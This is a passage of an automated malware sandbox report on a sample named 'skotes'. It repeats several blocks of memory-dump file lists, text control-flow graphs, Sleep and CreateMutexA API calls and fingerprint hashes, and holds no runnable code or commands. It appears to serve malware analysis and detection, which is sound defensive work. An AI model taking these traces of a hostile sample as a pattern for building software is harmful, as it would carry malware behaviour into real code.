                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: a5dbaff5cd2aca4baf1ec2beefc87442a392407f8924a422e782cc1f4424c771
                                                                                                                                                                                                                                                                • Instruction ID: 04fc72bf9f2452ed9a239a68016508e87b46b72913b90ffe8ae6b6ad9823a408
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5dbaff5cd2aca4baf1ec2beefc87442a392407f8924a422e782cc1f4424c771
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD3127317102009BEB08ABB8DD9DBADF7A6EFA6310F204219E018973D6D7758980C662

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 164 aaa54d-aaa56d 168 aaa59b-aaa5b7 164->168 169 aaa56f-aaa57b 164->169 172 aaa5b9-aaa5c5 168->172 173 aaa5e5-aaa604 168->173 170 aaa57d-aaa58b 169->170 171 aaa591-aaa598 call abd663 169->171 170->171 176 aaa944-aaa994 call ad6c6a * 3 Sleep CreateMutexA 170->176 171->168 178 aaa5db-aaa5e2 call abd663 172->178 179 aaa5c7-aaa5d5 172->179 174 aaa632-aaa916 call ab80c0 173->174 175 aaa606-aaa612 173->175 181 aaa628-aaa62f call abd663 175->181 182 aaa614-aaa622 175->182 198 aaa996-aaa998 176->198 199 aaa9a7-aaa9a8 176->199 178->173 179->176 179->178 181->174 182->176 182->181 198->199 200 aaa99a-aaa9a5 198->200 200->199
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 7d693d5cf76b3b3d24dc2585a131073a907b4772692663f3b2b7e6562315504c
                                                                                                                                                                                                                                                                • Instruction ID: 7f76d04e8e8b7681a8bb5d42a95fc2e8ca5e22e0750a02dd69d488356cb71865
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d693d5cf76b3b3d24dc2585a131073a907b4772692663f3b2b7e6562315504c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89314C31B002018BEB08DB78DD9DBADF7E6EFA6314F244619E019973D1D7358981C726

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 202 aaa682-aaa6a2 206 aaa6d0-aaa6ec 202->206 207 aaa6a4-aaa6b0 202->207 210 aaa71a-aaa739 206->210 211 aaa6ee-aaa6fa 206->211 208 aaa6b2-aaa6c0 207->208 209 aaa6c6-aaa6cd call abd663 207->209 208->209 214 aaa949-aaa994 call ad6c6a * 2 Sleep CreateMutexA 208->214 209->206 212 aaa73b-aaa747 210->212 213 aaa767-aaa916 call ab80c0 210->213 216 aaa6fc-aaa70a 211->216 217 aaa710-aaa717 call abd663 211->217 219 aaa749-aaa757 212->219 220 aaa75d-aaa764 call abd663 212->220 234 aaa996-aaa998 214->234 235 aaa9a7-aaa9a8 214->235 216->214 216->217 217->210 219->214 219->220 220->213 234->235 236 aaa99a-aaa9a5 234->236 236->235
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: ef9726e732b0065106a53eeb2db093685be7f5bc7504ebc53562676a5d1bf75e
                                                                                                                                                                                                                                                                • Instruction ID: 587333031ef9a0341c357b506eb0837d6c9c200b5106503f2d1989e61ae2ddcc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef9726e732b0065106a53eeb2db093685be7f5bc7504ebc53562676a5d1bf75e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84312A317002009BEB18DB78DD9DBAEF7F6DBA6310F248619E018D73D5D7758981C662

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 aa9adc-aa9ae8 239 aa9aea-aa9af8 238->239 240 aa9afe-aa9d91 call abd663 call ab7a00 call aa5c10 call aa8b30 call ab8220 call ab7a00 call aa5c10 call aa8b30 call ab8220 238->240 239->240 241 aaa917 239->241 244 aaa953-aaa994 Sleep CreateMutexA 241->244 245 aaa917 call ad6c6a 241->245 250 aaa996-aaa998 244->250 251 aaa9a7-aaa9a8 244->251 245->244 250->251 253 aaa99a-aaa9a5 250->253 253->251
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755889894.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755907151.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755931575.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755950655.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755966139.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755986614.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756004287.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756021452.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756043120.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756058423.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756072999.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756087074.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756104093.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756121466.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756137947.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756154534.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756172322.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756190023.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756205592.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756220484.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756238338.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756254012.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756276410.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756291352.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756335498.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756351675.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756366936.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756382308.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756400469.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1756415306.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: be1784f355458eeee4f902ab70ec508814cd9072a63f5dfa8f03cbd889c7bcea
                                                                                                                                                                                                                                                                • Instruction ID: 279a0046b1364bb4108e558990b19e18208cb9b1af6e18813ba09f74b08ce900
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be1784f355458eeee4f902ab70ec508814cd9072a63f5dfa8f03cbd889c7bcea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 132149317042009BEB18AB6CEC9DBAEF7A5EBD2310F204219E418872D5DB759981C621

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 306 aaa856-aaa86e 307 aaa89c-aaa89e 306->307 308 aaa870-aaa87c 306->308 311 aaa8a9-aaa8b1 call aa7d30 307->311 312 aaa8a0-aaa8a7 307->312 309 aaa87e-aaa88c 308->309 310 aaa892-aaa899 call abd663 308->310 309->310 314 aaa94e-aaa987 call ad6c6a Sleep CreateMutexA 309->314 310->307 321 aaa8b3-aaa8bb call aa7d30 311->321 322 aaa8e4-aaa8e6 311->322 316 aaa8eb-aaa916 call ab80c0 312->316 327 aaa98e-aaa994 314->327 321->322 328 aaa8bd-aaa8c5 call aa7d30 321->328 322->316 329 aaa996-aaa998 327->329 330 aaa9a7-aaa9a8 327->330 328->322 334 aaa8c7-aaa8cf call aa7d30 328->334 329->330 332 aaa99a-aaa9a5 329->332 332->330 334->322 338 aaa8d1-aaa8d9 call aa7d30 334->338 338->322 341 aaa8db-aaa8e2 338->341 341->316
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754737566.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1754799297.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755139942.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755298174.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755353906.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755739076.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755765591.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755792758.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755840673.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.1755861047.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
